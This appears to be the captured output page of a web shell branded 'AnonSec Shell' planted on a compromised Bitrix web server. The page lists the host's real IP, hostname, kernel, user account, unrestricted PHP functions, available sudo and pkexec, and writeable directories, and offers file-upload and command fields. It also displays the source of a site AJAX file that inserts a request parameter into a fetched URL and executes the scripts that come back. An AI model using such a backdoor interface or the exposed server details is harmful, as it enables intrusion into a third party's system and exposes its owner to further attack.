AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.22.248.94
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/ajax/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/ajax/fast_view_services.php
<?define("STATISTIC_SKIP_ACTIVITY_CHECK", "true");?>
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");?>
<?
if(isset($_GET['iblock_id']) && $_GET['iblock_id'])
{
	$url = htmlspecialcharsbx(urldecode($_GET['item_href']));
?>

	<script>
		var objUrl = parseUrlQuery(),
			add_url = '<?=(strpos($url, '?') !== false ? '&' : '?')?>FAST_VIEW=Y';
		if('clear_cache' in objUrl)
		{
			if(objUrl.clear_cache == 'Y')
				add_url += '&clear_cache=Y';
		}
		$('.fast_view_services').addClass('loading_block');
		BX.ajax({
			url: '<?=$url;?>'+add_url,
			method: 'POST',
			data: BX.ajax.prepareData({'FAST_VIEW':'Y'}),
			dataType: 'html',
			processData: false,
			start: true,
			headers: [{'name': 'X-Requested-With', 'value': 'XMLHttpRequest'}],
			onfailure: function(data) {
				alert('Error connecting server');
			},
			onsuccess: function(html){
				var ob = BX.processHTML(html);				
				// inject
				BX('fast_view_services').innerHTML = ob.HTML;
				BX.ajax.processScripts(ob.SCRIPT);	
			}
		})
		<?if(!$GLOBALS['bMobileForm']):?>
			$(document).on('click', '.jqmClose', function(e){
				e.preventDefault();
				$(this).closest('.jqmWindow').jqmHide();
			})
		<?endif;?>
	</script>
	<div id="fast_view_services"></div>
<?}?>

Anon7 - 2022
AnonSec Team